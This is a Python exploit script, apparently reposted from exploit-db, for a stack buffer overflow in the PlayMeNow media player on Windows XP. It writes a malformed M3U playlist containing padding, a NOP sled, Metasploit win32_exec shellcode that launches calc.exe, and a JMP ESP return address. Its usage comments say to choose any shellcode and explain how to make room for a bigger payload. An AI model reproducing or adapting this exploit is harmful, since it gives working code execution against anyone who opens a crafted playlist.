#!/usr/bin/python# Vulnerability: PlayMeNow Malformed M3U Playlist WinXP Universal BoF# Product: PlayMeNow - media player.# Versions affected: Tested with 7.3 and 7.4# Tested on: Windows XP Pro SP2/3 & Home SP3# Author: loneferret# Original Author: Gr33nG0bL1n# Reference: http://www.exploit-db.com/exploits/10556# Date: 19/12/2009# Usage: Just choose your shellcode and open the created file(PlayMeNow_expl.m3u) with PlayMeNow.# The offset is 1040, but the return address used brings us into it. So the shellcode is part of our# offset buffer. Also, yes the return address does contain \x00. If you want to put in a bigger payload# play around with the first & second set of As and those nops.buffer="\x41"*465buffer+="\x90"*110#win32_exec - #EXITFUNC=thread #CMD=calc.exe Size=164 Encoder=PexFnstenvSub #http://metasploit.com */buffer+=("\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4""\x5b\x35\x61\x83\xeb\xfc\xe2\xf4\x38\xb3\x71\x61\xc4\x5b\xbe\x24""\xf8\xd0\x49\x64\xbc\x5a\xda\xea\x8b\x43\xbe\x3e\xe4\x5a\xde\x28""\x4f\x6f\xbe\x60\x2a\x6a\xf5\xf8\x68\xdf\xf5\x15\xc3\x9a\xff\x6c""\xc5\x99\xde\x95\xff\x0f\x11\x65\xb1\xbe\xbe\x3e\xe0\x5a\xde\x07""\x4f\x57\x7e\xea\x9b\x47\x34\x8a\x4f\x47\xbe\x60\x2f\xd2\x69\x45""\xc0\x98\x04\xa1\xa0\xd0\x75\x51\x41\x9b\x4d\x6d\x4f\x1b\x39\xea""\xb4\x47\x98\xea\xac\x53\xde\x68\x4f\xdb\x85\x61\xc4\x5b\xbe\x09""\xf8\x04\x04\x97\xa4\x0d\xbc\x99\x47\x9b\x4e\x31\xac\xb4\xfb\x81""\xa4\x33\xad\x9f\x4e\x55\x62\x9e\x23\x38\x54\x0d\xa7\x75\x50\x19""\xa1\x5b\x35\x61")buffer+="\x41"*301# end of our 1040 bytebuffer+="\x8c\x92\x5b\x00"# 0x005B928C JMP ESP @ autorun.exebuffer+="\xCC"*2800# junkfile=open('playmenow.m3u','w')file.write(buffer)# write filefile.close()
